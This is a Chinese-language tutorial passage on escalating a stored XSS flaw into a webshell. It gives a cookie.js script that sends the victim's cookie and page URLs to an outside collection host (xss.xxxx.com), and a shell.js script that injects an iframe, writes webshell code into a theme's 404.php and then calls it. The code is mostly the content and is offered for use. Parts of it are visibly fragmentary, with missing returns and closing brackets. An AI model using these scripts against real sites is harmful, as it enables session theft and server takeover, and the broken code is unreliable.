然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了
接下来我要讲的是如何用这个xss漏洞反弹shell,这个方法我也是琢磨了很久才知道的,因为要用到js代码文件,代码文件如下:
cookie.js
var website = "http://xss.xxxx.com";
(new Image()).src = website
+ "&location=" + escape((function() {
return document.location.href;
+ "&toplocation=" + escape((function() {
return top.location.href;
+ "&cookie=" + escape((function() {
+ "&opener=" + escape((function() {
return (window.opener && window.opener.location.href) ? window.opener.location.href : '';
shell.js
// 创建一个包含要注入的 iframe 的 HTML 字符串
var oldata=document.body.innerHTML;
document.body.innerHTML=(oldata+data2);
// times 和 g_shell 变量用来跟踪 poc 函数执行的次数和是否已经成功注入 webshell
// 如果执行次数 >= 10,或者已经成功注入 webshell,就不再执行
// 获取要修改的 DOM 节点和触发“保存修改”操作的按钮
var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');
var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');
// 保存要修改的原始数据,将要注入的 webshell 代码添加到末尾
olddatas=htmldata.innerText;
htmldata.innerText=('\n')+olddatas;
// 如果已经成功注入 webshell,通过 AJAX 请求访问 webshell 接口
var xhr1=new XMLHttpRequest();
xhr1.open('get','/usr/themes/Kratos/404.php?shell=1');
然后这里就像上面反弹xss代码一样书写网址
http://xxx.xxx.com/cookie.js">